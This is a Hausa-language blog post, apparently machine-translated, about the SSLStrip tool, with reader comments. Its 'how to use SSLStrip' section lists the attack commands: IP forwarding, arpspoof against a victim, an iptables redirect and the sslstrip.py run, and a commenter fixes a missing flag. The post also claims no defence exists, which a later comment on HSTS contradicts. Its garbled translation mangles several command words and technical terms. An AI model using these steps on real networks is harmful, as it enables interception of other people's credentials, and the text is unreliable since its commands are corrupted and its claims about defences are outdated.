|
Moxie Marlinspike gabatar a Bakar hula 2009 wani nifty kayan aiki kira SSLStrip, aka umarta zuwa sa mai amfani ya gaskanta cewa yana kan gidan yanar gizo tare da ɓoye SSL yayin da a zahiri duk bayanan ana watsa su a bayyane. Allyari, SSLStrip yana yaudarar sabar yanar gizo, wanda ake zargin ɓoyayyen ɓoyayyensa duk da cewa rukunin yanar gizon yana ci gaba da nuna hali kamar yana aiki.
Kamar yadda zan iya gano, wannan hanyar har yanzu tana aiki mai girma. Har yanzu barazanar tana nan kuma duk an fallasa mu. Buahaha ... |
Bari mu fara da kayan yau da kullun: menene abin ban sha'awa shine SSL?
Ga wadanda basu sani ba, Layer Layer Launi (SSL; amintaccen tsarin yarjejeniya) da magajinsa Layer Tsaro Layer (TLS; tsaro na safarar sufuri) sune Hannun ladabi waɗanda ke samar da amintaccen sadarwa akan hanyar sadarwa, galibi Intanet.
SSL tana gudana akan shafi tsakanin ladaran aikace-aikacen kamar HTTP, SMTP, NNTP, da kan yarjejeniyar jigilar kayayyaki na TCP, wanda ɓangare ne na dangin TCP / IP na ladabi. Kodayake tana iya samar da tsaro ga kowace yarjejeniya da ke amfani da haɗin haɗin gwiwa (kamar TCP), ana amfani da shi a mafi yawan lokuta tare da haɗin HTTP don ƙirƙirar HTTPS. HTTPS ana amfani dashi don amintar da shafukan yanar gizo na Duniyar don aikace-aikacen yanar gizo. sana'ar lantarki, ta amfani da takaddun shaida na maɓallin jama'a don tabbatar da asalin ƙarshen ƙarshen.
SSLStrip… shin batsa ta dawo ga amfani da Linux?
Aiki na SSLStrip Abu ne mai sauki, maye gurbin duk buƙatun HTTPS na shafin yanar gizo ta HTTP sannan yayi MITM (kai hari ga «Mutum a Tsakiya«) Tsakanin saba da abokin ciniki. Manufar ita ce, wanda aka azabtar da maharin sun yi sadarwa ta hanyar HTTP, yayin da maharin da sabar suke sadarwa ta hanyar HTTPS tare da takardar shaidar sabar. Don haka, maharin yana iya ganin duk zirga-zirgar bayin wanda aka azabtar.
Anan akwai bidiyo inda zamu ga yadda wannan ingantaccen kayan aiki yake aiki.
Yadda ake amfani da SSLStrip
1.- Sanya Mikawa ta IP
amsa kuwwa 1> / proc / sys / net / ipv4 / ip_forward
2.- Yin harin ARP MITM tsakanin injunan 2:
arpspoof -i eth0 -tVICTIMA BAKON
3.- Canza hanyar zirga-zirga tare da kayan aiki:
iptables -t nat -A PREROUTING -p tcp –danarwa-tashar 80 -j REDIRECT –to-tashar jiragen ruwa 8080
4.- Fara SSLStrip akan tashar da aka yi amfani da shi
python sslstrip.py -w fayil
Yadda za a kare kanka daga hare-haren SSLStrip?
Wannan shine mafi kyawu da ban tsoro: ba zai iya ba.
Kamar yadda Moxie ya nuna (nasa video kadan ba a bata minti 69 ba) hanya daya mai yiwuwa wacce za a iya magance wannan ita ce ta boye dukkan hanyoyin sadarwa na HTTP, wato, cewa "HTTP" na kowa da na daji ana maye gurbinsa a dukkan al'amuransa ta hanyar "HTTPS", ba tare da la'akari da shafi ko sabis ba. . Kamar yadda Moxie ya sanya shi, 'amintacciyar yarjejeniya wacce ta dogara da layin rashin tsaro matsala ce".
Me za ku iya yi azaman mai amfani don aƙalla rage damar kai hari? Tabbatar ta hanyar da ba ta dace ba cewa akwai "https" a gaban kowane shafin da aka yi sulhu, ko a yanayin shigar da masu amfani da Firefox NoScript kuma tilasta haɗin HTTPS akan dukkan shafuka. Kuma duk da haka wannan kawai zai rage tasirin, ba zai hana shi ba.
Mmmm ... game da https wanda ke kiyaye ku daga gajerar hanya, yana da dangantaka.
Ban sani ba har zuwa yaya hare-haren mitm ba su ci nasara ba game da haɗin SSL, hare-haren mitm suna aiki a kan mahaɗin mahaɗin yayin ssl a kan jigilar jigilar kayayyaki, don haka kama bayanai zai yiwu.
Tun da daɗewa ina yin gwaje-gwaje don aikin kwas ɗin da nayi tare da mitm a cikin cibiyar sadarwar ku kuma yana yiwuwa a ɗauki bayanan da SSL ta aiko, gwada hotmail (wanda shine ssl) kuma yana dawo da izinin ba tare da matsala ba. Yi tunani kawai, maharin yana kwaikwayon ƙofar kuma yana karɓar duk bayanan daga wanda aka azabtar.
Hanya guda daya da za'a san cewa bayananku suna tafiya cikin aminci shine ta amfani da ramin ssh.
Abin da zan yi idan na ji an ɗan tsananta min shi ne in haɗa da sabuwata ta amfani da ssh, rami ta tashar jirgin ruwa ta gida, in buɗe kwandunan kuma in yi amfani da haɗin intanet a gida don yin yawo yayin kwamfutar wani.
Kuma kamar yadda suka ce, babu wata hanyar da za a iya guje wa wannan harin, face don tabbatar da dhcp ɗinmu ta mac da kuma tabbatar da wanda ya haɗa….
hello, cikin umarni 4 kun ɓace "-l 8080"
lafiya. godiya!
Don zama takamaimai, ma'anar da ba za ku iya kare kanku ba sau ɗaya ya kasance cikin harin MitM. Akwai hanyoyi daban-daban don kare kanka daga wannan harin, kodayake yana da wahala saboda yana da bambance-bambancen karatu.
Shirya:
Aukaka bayanan faɗar tana da daraja! Na gano cewa aƙalla tun daga watan Janairun 2012 masu bincike na chrome da Firefox (ba zan yi mamaki ba idan duk suna cikin wannan lokacin) suna amfani da kanun labarai na HSTS. Rubutun kai tsaye yana warware raunin ta hanyar sanar da mai binciken cewa "haɗi" dole ne koyaushe suyi amfani da SSL bayan ƙoƙari ɗaya na farko don haɗawa zuwa wani shafi (wannan yana kiyaye yanayin rashin lafiyar kaɗan). Bugu da ƙari, Chrome yana haɓaka tsaro ta ƙara jerin rukunin yanar gizon HSTS (mai yiwuwa mafi shahara a yanar gizo). tushe: http://forums.hak5.org/index.php?/topic/25322-sslstrip-not-working-with-gmail-twitter/
Yayi kyau sosai, ina ganin yana da kyau sosai. Tunanin yana da sauki simple
Haka ne…
Shin akwai wanda ya san idan za a iya amfani da arpspoof lokacin da muke da runduna sama da ɗaya a kan hanyar sadarwar? Na gode.